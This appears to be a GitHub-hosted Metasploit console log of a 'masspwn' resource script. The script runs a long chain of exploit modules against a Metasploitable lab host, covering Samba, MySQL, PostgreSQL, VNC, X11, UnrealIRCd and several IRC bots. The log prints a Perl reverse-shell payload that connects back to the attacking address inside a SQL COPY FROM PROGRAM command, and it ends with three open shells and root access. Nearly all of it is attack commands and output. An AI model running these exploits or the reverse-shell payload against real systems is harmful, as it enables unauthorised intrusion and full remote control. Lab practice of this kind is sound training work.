resource (masspwn.msf)> set LHOST 192.168.1.207
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2111
LPORT => 2111
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[*] 192.168.1.245:3306 - Trying target MySQL 5.0.45-Debian_1ubuntu3.1-log...
[*] 192.168.1.245:139 - Trying return address 0xffbfec70...
[*] 192.168.1.245:139 - Trying return address 0xbfffe1fc...
[*] 192.168.1.245:139 - Trying return address 0xbfbfe4fc...
[*] 192.168.1.245:139 - Trying return address 0x081ed5f2...
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[*] Exploit running as background job 102.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/multi/postgres/postgres_copy_from_program_cmd_exec
[*] Started reverse TCP handler on 192.168.1.207:2111
resource (masspwn.msf)> set RHOST 192.168.1.245
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2112
LPORT => 2112
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[*] 192.168.1.245:139 - Trying return address 0xffbfebf0...
[*] 192.168.1.245:139 - Trying return address 0xbfffdffc...
[*] 192.168.1.245:139 - Trying return address 0xbfbfe3fc...
[*] 192.168.1.245:3306 - Server reports version: 5.0.51a-3ubuntu5
[*] 192.168.1.245:3306 - Attempting to locate a corresponding target
[-] 192.168.1.245:3306 - Exploit aborted due to failure: no-target: Unable to detect target automatically
[*] 192.168.1.245:139 - Trying return address 0x081ed5f2...
[*] 192.168.1.245:139 - Trying return address 0xffbfeb70...
[*] 192.168.1.245:139 - Trying return address 0xbfbfe2fc...
[*] 192.168.1.245:139 - Trying return address 0xbfffddfc...
[*] 192.168.1.245:139 - Trying return address 0x081ed5f2...
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[*] Exploit running as background job 103.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/multi/postgres/postgres_createlang
[*] Started reverse TCP handler on 192.168.1.207:2112
resource (masspwn.msf)> set RHOST 192.168.1.245
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2113
LPORT => 2113
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[*] 192.168.1.245:5432 - 192.168.1.245:5432 - PostgreSQL 8.3.1 on i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.2.3 (Ubuntu 4.2.3-2ubuntu4)
[*] 192.168.1.245:5432 - Exploiting...
[+] 192.168.1.245:5432 - 192.168.1.245:5432 - j3dHMYba dropped successfully
[+] 192.168.1.245:5432 - 192.168.1.245:5432 - j3dHMYba created successfully
[!] 192.168.1.245:5432 - 192.168.1.245:5432 - Unable to execute query: COPY j3dHMYba FROM PROGRAM 'perl -MIO -e ''$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"192.168.1.207:2112");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};''';
[!] 192.168.1.245:5432 - 192.168.1.245:5432 - Unable to execute query: COPY j3dHMYba FROM PROGRAM 'perl -MIO -e ''$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"192.168.1.207:2112");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};''';
[-] 192.168.1.245:5432 - Exploit Failed
[*] 192.168.1.245:139 - Trying return address 0xffbfeaf0...
[*] 192.168.1.245:139 - Trying return address 0xbfbfe1fc...
[*] 192.168.1.245:139 - Trying return address 0xbfffdbfc...
[*] 192.168.1.245:139 - Trying return address 0x081ed5f2...
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[*] Exploit running as background job 104.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/multi/vnc/vnc_keyboard_exec
[*] Started reverse TCP double handler on 192.168.1.207:2113
resource (masspwn.msf)> set RHOST 192.168.1.245
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2114
LPORT => 2114
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[*] 192.168.1.245:139 - Trying return address 0xffbfea70...
[*] 192.168.1.245:139 - Trying return address 0xbfbfe0fc...
[*] 192.168.1.245:139 - Trying return address 0xbfffd9fc...
[*] 192.168.1.245:139 - Trying return address 0x081ed5f2...
[*] 192.168.1.245:5432 - 192.168.1.245:5432 - PostgreSQL 8.3.1 on i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.2.3 (Ubuntu 4.2.3-2ubuntu4)
[*] 192.168.1.245:5432 - 192.168.1.245:5432 - perl could not be loaded
[*] 192.168.1.245:5432 - 192.168.1.245:5432 - python could not be loaded
[*] 192.168.1.245:5432 - 192.168.1.245:5432 - python2 could not be loaded
[*] 192.168.1.245:5432 - 192.168.1.245:5432 - python3 could not be loaded
[*] 192.168.1.245:139 - Trying return address 0xffbfe9f0...
[*] 192.168.1.245:139 - Trying return address 0xbfffd7fc...
[*] 192.168.1.245:139 - Trying return address 0xbfbfdffc...
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[*] 192.168.1.245:139 - Trying return address 0x081ed5f2...
[*] 192.168.1.245:139 - Trying return address 0xbfffd5fc...
[*] 192.168.1.245:139 - Trying return address 0xffbfe970...
[*] 192.168.1.245:139 - Trying return address 0xbfbfdefc...
[*] Exploit running as background job 105.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/unix/x11/x11_keyboard_exec
[*] Started reverse TCP handler on 192.168.1.207:2114
resource (masspwn.msf)> set RHOST 192.168.1.245
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
[*] 192.168.1.245:5900 - 192.168.1.245:5900 - Bypass authentication
[*] 192.168.1.245:5900 - 192.168.1.245:5900 - Opening Run command
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2115
LPORT => 2115
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[*] 192.168.1.245:139 - Trying return address 0x081ed5f2...
[*] 192.168.1.245:139 - Trying return address 0xbfbfddfc...
[*] 192.168.1.245:139 - Trying return address 0xffbfe8f0...
[*] 192.168.1.245:139 - Trying return address 0xbfffd3fc...
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[*] 192.168.1.245:139 - Trying return address 0x081ed5f2...
[-] 192.168.1.245:6000 - Exploit failed: A payload has not been selected.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/unix/irc/unreal_ircd_3281_backdoor
[*] 192.168.1.245:1099 - Server stopped.
resource (masspwn.msf)> set RHOST 192.168.1.245
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2116
LPORT => 2116
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[*] 192.168.1.245:139 - Trying return address 0xffbfe870...
[*] 192.168.1.245:139 - Trying return address 0xbfffd1fc...
[*] 192.168.1.245:139 - Trying return address 0xbfbfdcfc...
[-] 192.168.1.245:5900 - Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer
[*] 192.168.1.245:139 - Trying return address 0x081ed5f2...
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[*] 192.168.1.245:139 - Trying return address 0xbfffcffc...
[*] Exploit running as background job 106.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/multi/misc/w3tw0rk_exec
[*] 192.168.1.245:139 - Trying return address 0xbfbfdbfc...
[*] 192.168.1.245:139 - Trying return address 0xffbfe7f0...
[*] Started reverse TCP double handler on 192.168.1.207:2116
resource (masspwn.msf)> set RHOST 192.168.1.245
[*] 192.168.1.245:6667 - Connected to 192.168.1.245:6667...
    :irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
    :irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
[*] 192.168.1.245:6667 - Sending backdoor command...
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
[*] Accepted the first client connection...
[*] Accepted the second client connection...
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2117
LPORT => 2117
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[*] Command: echo 3qdTAMqOw6z2LMyl;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] 192.168.1.245:139 - Trying return address 0x081ed5f2...
[*] 192.168.1.245:139 - Trying return address 0xbfffcdfc...
[*] 192.168.1.245:139 - Trying return address 0xffbfe770...
[*] 192.168.1.245:139 - Trying return address 0xbfbfdafc...
[*] Reading from socket B
[*] B: "3qdTAMqOw6z2LMyl\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 3 opened (192.168.1.207:2116 -> 192.168.1.245:54945) at 2019-08-16 00:50:39 -0400
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[*] 192.168.1.245:139 - Trying return address 0x081ed5f2...
[*] Exploit running as background job 107.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/multi/misc/legend_bot_exec
[*] Started reverse TCP double handler on 192.168.1.207:2117
resource (masspwn.msf)> set RHOST 192.168.1.245
[*] 192.168.1.245:6667 - 192.168.1.245:6667 - Registering with the IRC Server...
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2118
LPORT => 2118
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[*] 192.168.1.245:139 - Trying return address 0xbfbfd9fc...
[*] 192.168.1.245:139 - Trying return address 0xffbfe6f0...
[*] 192.168.1.245:139 - Trying return address 0xbfffcbfc...
[*] 192.168.1.245:139 - Trying return address 0x081ed5f2...
[*] 192.168.1.245:139 - Trying return address 0xbfbfd8fc...
[*] 192.168.1.245:139 - Trying return address 0xbfffc9fc...
[*] 192.168.1.245:139 - Trying return address 0xffbfe670...
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[*] 192.168.1.245:6667 - 192.168.1.245:6667 - Joining the #channel channel...
[*] Exploit running as background job 108.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/multi/misc/ra1nx_pubcall_exec
[*] Started reverse TCP double handler on 192.168.1.207:2118
resource (masspwn.msf)> set RHOST 192.168.1.245
[*] 192.168.1.245:6667 - 192.168.1.245:6667 - Registering with the IRC Server...
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2119
LPORT => 2119
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[*] 192.168.1.245:139 - Trying return address 0x081ed5f2...
[*] 192.168.1.245:139 - Trying return address 0xbfbfd7fc...
[*] 192.168.1.245:139 - Trying return address 0xbfffc7fc...
[*] 192.168.1.245:139 - Trying return address 0xffbfe5f0...
[*] 192.168.1.245:6667 - 192.168.1.245:6667 - Exploiting the IRC bot...
[*] 192.168.1.245:139 - Trying return address 0x081ed5f2...
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[*] 192.168.1.245:139 - Trying return address 0xbfbfd6fc...
[*] 192.168.1.245:6667 - 192.168.1.245:6667 - Joining the #channel channel...
[*] 192.168.1.245:139 - Trying return address 0xbfffc5fc...
[*] Exploit running as background job 109.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/multi/misc/pbot_exec
[*] Started reverse TCP double handler on 192.168.1.207:2119
resource (masspwn.msf)> set RHOST 192.168.1.245
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2120
LPORT => 2120
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[*] 192.168.1.245:139 - Trying return address 0xffbfe570...
[*] 192.168.1.245:6667 - 192.168.1.245:6667 - Exploiting the malicious IRC bot...
[*] 192.168.1.245:139 - Trying return address 0x081ed5f2...
[*] 192.168.1.245:139 - Trying return address 0xbfffc3fc...
[*] 192.168.1.245:139 - Trying return address 0xbfbfd5fc...
[*] 192.168.1.245:139 - Trying return address 0xffbfe4f0...
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[*] Exploit running as background job 110.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/multi/misc/xdh_x_exec
[*] Started reverse TCP double handler on 192.168.1.207:2120
resource (masspwn.msf)> set RHOST 192.168.1.245
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2121
LPORT => 2121
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[*] 192.168.1.245:6667 - 192.168.1.245:6667 - Connecting to IRC server...
[*] 192.168.1.245:6667 - 192.168.1.245:6667 - Registering with the IRC Server...
[*] 192.168.1.245:6667 - 192.168.1.245:6667 - Exploiting the Ra1NX bot...
[*] 192.168.1.245:139 - Trying return address 0xbfffc1fc...
[*] 192.168.1.245:139 - Trying return address 0xbfbfd4fc...
[*] 192.168.1.245:139 - Trying return address 0x081ed5f2...
[*] 192.168.1.245:139 - Trying return address 0xffbfe470...
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[*] 192.168.1.245:139 - Trying return address 0xbfffbffc...
[*] 192.168.1.245:139 - Trying return address 0x081ed5f2...
[*] 192.168.1.245:139 - Trying return address 0xbfbfd3fc...
[*] 192.168.1.245:139 - Trying return address 0xffbfe3f0...
[*] Exploit running as background job 111.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> jobs -Ksessions
[*] Started reverse TCP double handler on 192.168.1.207:2121
Stopping all jobs...
[*] 192.168.1.245:6667 - 192.168.1.245:6667 - Registering with the IRC Server...
[*] 192.168.1.245:6667 - 192.168.1.245:6667 - Joining the #channel channel...
[-] 192.168.1.245:6667 - 192.168.1.245:6667 - Error joining the #channel channel
[*] 192.168.1.245:6667 - 192.168.1.245:6667 - Registering with the IRC Server...
[*] 192.168.1.245:6667 - 192.168.1.245:6667 - Joining the #channel channel...
[*] 192.168.1.245:6667 - 192.168.1.245:6667 - Exploiting the malicious IRC bot...
Invalid Job ID
msf5 exploit(multi/misc/xdh_x_exec) > sessions

Active sessions
===============

  Id  Name  Type            Information  Connection
  --  ----  ----            -----------  ----------
  1         shell cmd/unix               192.168.1.207:41547 -> 192.168.1.245:6200 (192.168.1.245)
  2         shell cmd/unix               192.168.1.207:2099 -> 192.168.1.245:46018 (192.168.1.245)
  3         shell cmd/unix               192.168.1.207:2116 -> 192.168.1.245:54945 (192.168.1.245)

msf5 exploit(multi/misc/xdh_x_exec) > sessions 1
[*] Starting interaction with 1...

id
uid=0(root) gid=0(root)
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

:)

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment